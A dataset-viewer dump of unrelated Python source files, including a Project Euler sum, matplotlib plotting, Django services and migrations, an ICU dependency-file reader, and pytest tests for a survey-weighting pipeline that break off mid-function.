index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
996,600 | aef70dd9254cc2f0299e9d9839f4ea58a3b3e567 | #!/usr/bin/env python3
def thousand():
"""Felsorolja és összeadja az 1000nél kisebb inteket
Amennyiben azok a három vagy az ötnek a töbszörösei"""
return sum([x for x in range(1000) if x%3==0 or x%5==0])
def main():
print(thousand())
if __name__ == "__main__":
main() |
996,601 | 2e24ccb931af1c73693b458ce482344a623d878d | #varsha
import pickle
import matplotlib.pyplot as plt
import os
from collections import OrderedDict
import numpy as np
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.backends.backend_pdf
path = 'C:\\Users\\supraja\\source\\repos\\DjangoWebProject1\\DjangoWebProject1\\pyt_Files\\pdf_Files\\' #path to dictionaries folder
subpath = 'C:\\Users\\supraja\\source\\repos\\DjangoWebProject1\\DjangoWebProject1\\pyt_Files\\pdf_Files\\' # path to dictionaies folder
#ch
# plots bar graph for tenant vs frequency
def tenant_frequency_plot():
pdf = matplotlib.backends.backend_pdf.PdfPages("C:\\Users\\supraja\\source\\repos\\DjangoWebProject1\\DjangoWebProject1\\pyt_Files\\pdf_Files\\tenants.pdf")
with open(os.path.join(subpath,'tenants_Dictionary' + '.txt'), 'rb') as handle:
tenantCounts = pickle.loads(handle.read())
#print(tenantCounts, type(tenantCounts))
plt.title("TENANTS FREQUENCY")
x = np.arange(2)
plt.xlabel('Tenants')
plt.ylabel('Frequency')
#print(tenantCounts.values(), type(tenantCounts.values()))
plt.bar(x, height = list(tenantCounts.values())[:2])
plt.xticks(x, list(tenantCounts.keys())[:2])
plt.xticks(rotation=90)
#figure = plt.gcf() #saving to pdf
#figure.set_size_inches(5, 5)
pdf.savefig(bbox_inches = "tight")
plt.close()
tenantCounts.pop('IONMessagingService', None)
tenantCounts.pop('ProvisioningService', None)
for each in range(1,(len(tenantCounts)//30+1)):
x = np.arange(30)
plt.xlabel('Tenants')
plt.ylabel('Frequency')
plt.bar(x, height = list(tenantCounts.values())[(each-1)*30:each *30])
plt.xticks(x, list(tenantCounts.keys())[(each-1)*30:each*30])
plt.xticks(rotation=90)
#figure = plt.gcf() #saving to pdf
#figure.set_size_inches(5, 5)
pdf.savefig(bbox_inches = "tight")
#plt.show()
rem = len(tenantCounts)%30
x = np.arange(rem)
plt.xlabel('Tenants')
plt.ylabel('Frequency')
plt.bar(x, height = list(tenantCounts.values())[-rem:])
plt.xticks(x, list(tenantCounts.keys())[-rem:])
plt.xticks(rotation=90)
#figure = plt.gcf() #saving to pdf
#figure.set_size_inches(5, 5)
pdf.savefig(bbox_inches = "tight")
#plt.show()
pdf.close()
|
996,602 | 4f323c60076efad3bab64d1014bd0b25f1c6de66 | """
@author : Qizhi He @ PNNL (qizhi.he@pnnl.gov)
"""
import tensorflow as tf
def tf_session():
# tf session
config = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True)
config.gpu_options.force_gpu_compatible = True
sess = tf.Session(config=config)
# self.sess = tf.Session(config=tf.ConfigProto(log_device_placement=True)) #standard setting
## init
init = tf.global_variables_initializer()
sess.run(init)
return sess
|
996,603 | 68a3852931be1e7ac61ce78d691375956501c4dd | number1 = int(input("Enter a number: "))
number2 = int(input("Enter a number: "))
number3 = int(input("Enter a number: "))
#if number1 > number2 and number2 > number3:
# print ("True")
#else:
# print ("False")
print (number1 > number2 and number2 > number3) |
996,604 | 66d603505ac88b8236d37d33097f5c0cbbe2f211 | from abc import ABCMeta, abstractmethod
from typing import List
from app.Dto.AircraftDto import *
from app.Dto.SelectDto import SelectAircraftDto
from app.repositories.AircraftRepository import AircraftRepository
class AircraftManagementService(metaclass=ABCMeta):
@abstractmethod
def register_aircraft(self, model: RegisterAircraftDto):
raise NotImplementedError
@abstractmethod
def edit_aircraft(self, aircraft_id: int, model: EditAircraftDto):
raise NotImplementedError
@abstractmethod
def list_aircraft(self) -> List[ListAircraftDto]:
raise NotImplementedError
@abstractmethod
def aircraft_details(self, aircraft_id: int) -> AircraftDetailsDto:
raise NotImplementedError
@abstractmethod
def get_aircraft_list(self) -> [SelectAircraftDto]:
raise NotImplementedError
class DefaultAircraftManagementService(AircraftManagementService):
repository: AircraftRepository
def __init__(self, repository: AircraftRepository):
self.repository = repository
def register_aircraft(self, model: RegisterAircraftDto):
return self.repository.register_aircraft(model)
def edit_aircraft(self, aircraft_id: int, model: EditAircraftDto):
return self.repository.edit_aircraft(aircraft_id, model)
def list_aircraft(self) -> List[ListAircraftDto]:
return self.repository.list_aircraft()
def aircraft_details(self, aircraft_id: int) -> AircraftDetailsDto:
return self.repository.aircraft_details(aircraft_id)
def delete_aircraft(self, aircraft_id: int):
return self.repository.delete_aircraft(aircraft_id)
def get_aircraft_list(self) -> [SelectAircraftDto]:
return self.repository.get_aircraft_list() |
996,605 | e73fe66d2ef184264e5df81e61a6bcdfb076d315 | import unittest
import os
from glob import glob
from nose_parameterized import parameterized
from ruamel.yaml import load
import six
from pyacd.parser import parse_acd
ACDTEST_DIR = '/usr/share/EMBOSS/acd'
def get_acds_list():
tests = []
acd_list = glob(ACDTEST_DIR+'/*.acd')
for acd_path in acd_list:
tests.append([acd_path])
return tests
class TestParseAcd(unittest.TestCase):
@parameterized.expand(get_acds_list())
def test_parse_command_line(self, acd_path):
try:
acd_string = open(acd_path, 'r').read()
acd_object = parse_acd(acd_string)
# sections count
self.assertEqual(acd_string.count('endsection'),
len(acd_object.desc_sections()))
except Exception as exc:
six.print_("Failure parsing ACD file {0}".format(acd_path))
raise exc
|
996,606 | f977a02ac5fc7677d8097528c2ebdf166af28e99 | #! /usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2014, International Business Machines
# Corporation and others. All Rights Reserved.
#
# file name: dependencies.py
#
# created on: 2011may26
"""Reader module for dependency data for the ICU dependency tester.
Reads dependencies.txt and makes the data available.
Attributes:
files: Set of "library/filename.o" files mentioned in the dependencies file.
items: Map from library or group names to item maps.
Each item has a "type" ("library" or "group" or "system_symbols").
A library or group item can have an optional set of "files" (as in the files attribute).
Each item can have an optional set of "deps" (libraries & groups).
A group item also has a "library" name unless it is a group of system symbols.
The one "system_symbols" item and its groups have sets of "system_symbols"
with standard-library system symbol names.
libraries: Set of library names mentioned in the dependencies file.
file_to_item: Map from a symbol (ushoe.o) to library or group (shoesize)
"""
__author__ = "Markus W. Scherer"
# TODO: Support binary items.
# .txt syntax: binary: tools/genrb
# item contents: {"type": "binary"} with optional files & deps
# A binary must not be used as a dependency for anything else.
import sys
files = set()
items = {}
libraries = set()
file_to_item = {}
_line_number = 0
_groups_to_be_defined = set()
def _CheckLibraryName(name):
global _line_number
if not name:
sys.exit("Error:%d: \"library: \" without name" % _line_number)
if name.endswith(".o"):
sys.exit("Error:%d: invalid library name %s" % (_line_number, name))
def _CheckGroupName(name):
global _line_number
if not name:
sys.exit("Error:%d: \"group: \" without name" % _line_number)
if "/" in name or name.endswith(".o"):
sys.exit("Error:%d: invalid group name %s" % (_line_number, name))
def _CheckFileName(name):
global _line_number
if "/" in name or not name.endswith(".o"):
sys.exit("Error:%d: invalid file name %s" % (_line_number, name))
def _RemoveComment(line):
global _line_number
_line_number = _line_number + 1
index = line.find("#") # Remove trailing comment.
if index >= 0: line = line[:index]
return line.rstrip() # Remove trailing newlines etc.
def _ReadLine(f):
while True:
line = _RemoveComment(f.next())
if line: return line
def _ReadFiles(deps_file, item, library_name):
global files
item_files = item.get("files")
while True:
line = _ReadLine(deps_file)
if not line: continue
if not line.startswith(" "): return line
if item_files == None: item_files = item["files"] = set()
for file_name in line.split():
_CheckFileName(file_name)
file_name = library_name + "/" + file_name
if file_name in files:
sys.exit("Error:%d: file %s listed in multiple groups" % (_line_number, file_name))
files.add(file_name)
item_files.add(file_name)
file_to_item[file_name] = item["name"]
def _IsLibrary(item): return item and item["type"] == "library"
def _IsLibraryGroup(item): return item and "library" in item
def _ReadDeps(deps_file, item, library_name):
global items, _line_number, _groups_to_be_defined
item_deps = item.get("deps")
while True:
line = _ReadLine(deps_file)
if not line: continue
if not line.startswith(" "): return line
if item_deps == None: item_deps = item["deps"] = set()
for dep in line.split():
_CheckGroupName(dep)
dep_item = items.get(dep)
if item["type"] == "system_symbols" and (_IsLibraryGroup(dep_item) or _IsLibrary(dep_item)):
sys.exit(("Error:%d: system_symbols depend on previously defined " +
"library or library group %s") % (_line_number, dep))
if dep_item == None:
# Add this dependency as a new group.
items[dep] = {"type": "group"}
if library_name: items[dep]["library"] = library_name
_groups_to_be_defined.add(dep)
item_deps.add(dep)
def _AddSystemSymbol(item, symbol):
exports = item.get("system_symbols")
if exports == None: exports = item["system_symbols"] = set()
exports.add(symbol)
def _ReadSystemSymbols(deps_file, item):
global _line_number
while True:
line = _ReadLine(deps_file)
if not line: continue
if not line.startswith(" "): return line
line = line.lstrip()
if '"' in line:
# One double-quote-enclosed symbol on the line, allows spaces in a symbol name.
symbol = line[1:-1]
if line.startswith('"') and line.endswith('"') and '"' not in symbol:
_AddSystemSymbol(item, symbol)
else:
sys.exit("Error:%d: invalid quoted symbol name %s" % (_line_number, line))
else:
# One or more space-separate symbols.
for symbol in line.split(): _AddSystemSymbol(item, symbol)
def Load():
"""Reads "dependencies.txt" and populates the module attributes."""
global items, libraries, _line_number, _groups_to_be_defined
deps_file = open("dependencies.txt")
try:
line = None
current_type = None
while True:
while not line: line = _RemoveComment(deps_file.next())
if line.startswith("library: "):
current_type = "library"
name = line[9:].lstrip()
_CheckLibraryName(name)
if name in items:
sys.exit("Error:%d: library definition using duplicate name %s" % (_line_number, name))
libraries.add(name)
item = items[name] = {"type": "library", "name": name}
line = _ReadFiles(deps_file, item, name)
elif line.startswith("group: "):
current_type = "group"
name = line[7:].lstrip()
_CheckGroupName(name)
if name not in items:
sys.exit("Error:%d: group %s defined before mentioned as a dependency" %
(_line_number, name))
if name not in _groups_to_be_defined:
sys.exit("Error:%d: group definition using duplicate name %s" % (_line_number, name))
_groups_to_be_defined.remove(name)
item = items[name]
item["name"] = name
library_name = item.get("library")
if library_name:
line = _ReadFiles(deps_file, item, library_name)
else:
line = _ReadSystemSymbols(deps_file, item)
elif line == " deps":
if current_type == "library":
line = _ReadDeps(deps_file, items[name], name)
elif current_type == "group":
item = items[name]
line = _ReadDeps(deps_file, item, item.get("library"))
elif current_type == "system_symbols":
item = items[current_type]
line = _ReadDeps(deps_file, item, None)
else:
sys.exit("Error:%d: deps before any library or group" % _line_number)
elif line == "system_symbols:":
current_type = "system_symbols"
if current_type in items:
sys.exit("Error:%d: duplicate entry for system_symbols" % _line_number)
item = items[current_type] = {"type": current_type, "name": current_type}
line = _ReadSystemSymbols(deps_file, item)
else:
sys.exit("Syntax error:%d: %s" % (_line_number, line))
except StopIteration:
pass
if _groups_to_be_defined:
sys.exit("Error: some groups mentioned in dependencies are undefined: %s" % _groups_to_be_defined)
|
996,607 | 41cf51bc638c11e8acccb02ccf8191aaaeedc0ef | # Generated by Django 3.1.5 on 2021-01-17 18:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('vocabulary', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Sentence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sentence', models.CharField(max_length=500)),
('vocab', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='vocabulary.studiedvocable')),
],
),
migrations.CreateModel(
name='Correction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note', models.CharField(max_length=500)),
('sentence', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exercises.sentence')),
],
),
]
|
996,608 | 9b141ccb469e289f82a7f89eb4683665b966b13a | import json
import os
import pytest
import time
import numpy as np
import pandas as pd
from pandas.util.testing import assert_frame_equal
import ips.steps.air_miles
import ips.steps.final_weight
import ips.steps.imbalance_weight
import ips.steps.minimums_weight
import ips.steps.non_response_weight
import ips.steps.rail_imputation
import ips.steps.regional_weights
import ips.steps.shift_weight
import ips.steps.spend_imputation
import ips.steps.stay_imputation
import ips.steps.town_stay_expenditure
import ips.steps.traffic_weight
import ips.steps.unsampled_weight
from ips.utils import common_functions as cf
from tests import common_testing_functions as ctf
from ips.db import data_management as idm
with open(r'data/steps_configuration.json') as config_file:
STEP_CONFIGURATION = json.load(config_file)
RUN_ID = 'test-main'
PV_RUN_ID = 'TEMPLATE'
TEST_DATA_DIR = r'tests\data\main\dec'
SURVEY_DATA_FILENAME = 'surveydata_out_expected.csv'
SUMMARY_DATA_FILENAME = 'summary_out_expected.csv'
START_TIME = time.time()
print("Module level start time: {}".format(START_TIME))
@pytest.fixture(scope='module')
def database_connection():
'''
This fixture provides the database connection. It is added to the function argument of each test
and picked up by the test from there. The fixture allows us to re-use the same database connection
over and over again.
'''
return cf.get_sql_connection()
def setup_module(module):
""" setup any state specific to the execution of the given module."""
# Import data to database
import_data_dir = r'tests\data\import_data\dec'
ctf.import_test_data_into_database(import_data_dir, RUN_ID)
# populates test data within pv table
conn = database_connection()
ctf.populate_test_pv_table(conn, RUN_ID, PV_RUN_ID)
def teardown_module(module):
""" teardown any state that was previously setup with a setup_module
method.
"""
cf.delete_from_table(idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', '=', RUN_ID)
# List of tables to cleanse where [RUN_ID] = RUN_ID
tables_to_cleanse = ['[dbo].[PROCESS_VARIABLE_PY]',
'[dbo].[PROCESS_VARIABLE_TESTING]',
'[dbo].[TRAFFIC_DATA]',
'[dbo].[SHIFT_DATA]',
'[dbo].[NON_RESPONSE_DATA]',
'[dbo].[UNSAMPLED_OOH_DATA]',
idm.SURVEY_SUBSAMPLE_TABLE]
# Try to delete from each table in list where condition. If exception occurs,
# assume table is already empty, and continue deleting from tables in list.
for table in tables_to_cleanse:
try:
cf.delete_from_table(table, 'RUN_ID', '=', RUN_ID)
except Exception:
continue
print("Duration: {}".format(time.strftime("%H:%M:%S", time.gmtime(time.time() - START_TIME))))
def test_shift_weight_step():
# # Assign variables
conn = database_connection()
step_name = "SHIFT_WEIGHT"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.shift_weight.shift_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.replace('None', np.nan, inplace=True)
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values(
['SHIFT_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'AM_PM_NIGHT_PV', 'MIGSI', 'POSS_SHIFT_CROSS',
'SAMP_SHIFT_CROSS', 'MIN_SH_WT', 'MEAN_SH_WT', 'MAX_SH_WT', 'COUNT_RESPS', 'SUM_SH_WT'])
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values(
['SHIFT_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'AM_PM_NIGHT_PV', 'MIGSI', 'POSS_SHIFT_CROSS',
'SAMP_SHIFT_CROSS', 'MIN_SH_WT', 'MEAN_SH_WT', 'MAX_SH_WT', 'COUNT_RESPS', 'SUM_SH_WT'])
expected_results['RUN_ID'] = RUN_ID
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_non_response_weight_steps():
# # Assign variables
conn = database_connection()
step_name = "NON_RESPONSE"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Non Response Weight step
ips.steps.non_response_weight.non_response_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results['NR_PORT_GRP_PV'] = pd.to_numeric(actual_results['NR_PORT_GRP_PV'], errors='coerce')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results['NR_PORT_GRP_PV'] = pd.to_numeric(expected_results['NR_PORT_GRP_PV'], errors='coerce')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values(
['NR_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'MEAN_RESPS_SH_WT', 'COUNT_RESPS', 'PRIOR_SUM',
'GROSS_RESP', 'GNR', 'MEAN_NR_WT'])
actual_results['NR_PORT_GRP_PV'] = pd.to_numeric(actual_results['NR_PORT_GRP_PV'], errors='coerce')
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values(
['NR_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'MEAN_RESPS_SH_WT', 'COUNT_RESPS', 'PRIOR_SUM',
'GROSS_RESP', 'GNR', 'MEAN_NR_WT'])
expected_results['RUN_ID'] = RUN_ID
expected_results['NR_PORT_GRP_PV'] = pd.to_numeric(expected_results['NR_PORT_GRP_PV'], errors='coerce')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_minimums_weight_step():
# # Assign variables
conn = database_connection()
step_name = "MINIMUMS_WEIGHT"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.minimums_weight.minimums_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results['MINS_PORT_GRP_PV'] = pd.to_numeric(actual_results['MINS_PORT_GRP_PV'], errors='coerce')
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values(
['MINS_PORT_GRP_PV', 'ARRIVEDEPART', 'MINS_CTRY_GRP_PV', 'MINS_NAT_GRP_PV', 'MINS_CTRY_PORT_GRP_PV',
'MINS_CASES', 'FULLS_CASES', 'PRIOR_GROSS_MINS', 'PRIOR_GROSS_FULLS', 'PRIOR_GROSS_ALL', 'MINS_WT', 'POST_SUM',
'CASES_CARRIED_FWD'])
actual_results['MINS_PORT_GRP_PV'] = pd.to_numeric(actual_results['MINS_PORT_GRP_PV'], errors='coerce')
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values(
['MINS_PORT_GRP_PV', 'ARRIVEDEPART', 'MINS_CTRY_GRP_PV', 'MINS_NAT_GRP_PV', 'MINS_CTRY_PORT_GRP_PV',
'MINS_CASES', 'FULLS_CASES', 'PRIOR_GROSS_MINS', 'PRIOR_GROSS_FULLS', 'PRIOR_GROSS_ALL', 'MINS_WT', 'POST_SUM',
'CASES_CARRIED_FWD'])
expected_results['RUN_ID'] = RUN_ID
expected_results['MINS_PORT_GRP_PV'] = pd.to_numeric(expected_results['MINS_PORT_GRP_PV'], errors='coerce')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_traffic_weight_step():
# # Assign variables
conn = database_connection()
step_name = "TRAFFIC_WEIGHT"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.traffic_weight.traffic_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values(
['SAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'CASES', 'TRAFFICTOTAL', 'SUM_TRAFFIC_WT', 'TRAFFIC_WT'])
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values(
['SAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'CASES', 'TRAFFICTOTAL', 'SUM_TRAFFIC_WT', 'TRAFFIC_WT'])
expected_results['RUN_ID'] = RUN_ID
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_unsampled_weight_step():
# Assign variables
conn = database_connection()
step_name = "UNSAMPLED_WEIGHT"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.unsampled_weight.unsampled_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
# Get results of Survey Data and compare
sql = """
SELECT {}
FROM {}
WHERE RUN_ID = '{}'
AND [SERIAL] not like '9999%'
AND [RESPNSE] between 1 and 2
""".format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.fillna(value=np.nan, inplace=True)
actual_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(actual_results['UNSAMP_REGION_GRP_PV'],
errors='coerce',
downcast='float')
actual_results.index = range(0, len(actual_results))
expected_results.columns = expected_results.columns.str.upper()
expected_results = expected_results.sort_values('SERIAL')
expected_results.fillna(value=np.nan, inplace=True)
expected_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(expected_results['UNSAMP_REGION_GRP_PV'],
errors='coerce',
downcast='float')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_survey_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_survey_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]["ps_table"], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(actual_results['UNSAMP_REGION_GRP_PV'],
errors='coerce',
downcast='float')
actual_results = actual_results.sort_values(
['UNSAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'UNSAMP_REGION_GRP_PV', 'CASES', 'SUM_PRIOR_WT', 'SUM_UNSAMP_TRAFFIC_WT',
'UNSAMP_TRAFFIC_WT'])
actual_results.index = range(0, len(actual_results))
expected_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(expected_results['UNSAMP_REGION_GRP_PV'],
errors='coerce',
downcast='float')
expected_results['RUN_ID'] = RUN_ID
expected_results = expected_results.sort_values(
['UNSAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'UNSAMP_REGION_GRP_PV', 'cases', 'sum_prior_wt', 'sum_unsamp_traffic_wt',
'unsamp_traffic_wt'])
expected_results[['cases', 'sum_prior_wt', 'sum_unsamp_traffic_wt',
'unsamp_traffic_wt']] = expected_results[['cases', 'sum_prior_wt', 'sum_unsamp_traffic_wt',
'unsamp_traffic_wt']].round(3)
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_summary_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\unsampled_summary_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False, check_like=True)
@pytest.mark.xfail
def test_imbalance_weight_step():
# Assign variables
conn = database_connection()
step_name = "IMBALANCE_WEIGHT"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.imbalance_weight.imbalance_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
# Get results of Survey Data and compare
sql = """
SELECT {}
FROM {}
WHERE RUN_ID = '{}'
AND [SERIAL] not like '9999%'
AND [RESPNSE] between 1 and 6
""".format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_survey_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_survey_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values(['FLOW', 'SUM_PRIOR_WT', 'SUM_IMBAL_WT'])
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values(['FLOW', 'SUM_PRIOR_WT', 'SUM_IMBAL_WT'])
expected_results['RUN_ID'] = RUN_ID
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_summary_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\imbalance_summary_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_final_weight_step():
# Assign variables
conn = database_connection()
step_name = "FINAL_WEIGHT"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.final_weight.final_weight_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
# Get results of Survey Data and compare
sql = """
SELECT {}
FROM {}
WHERE RUN_ID = '{}'
AND SERIAL not like '9999%'
AND RESPNSE between 1 and 6
""".format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_survey_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_survey_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
# Get results of Summary Data and compare
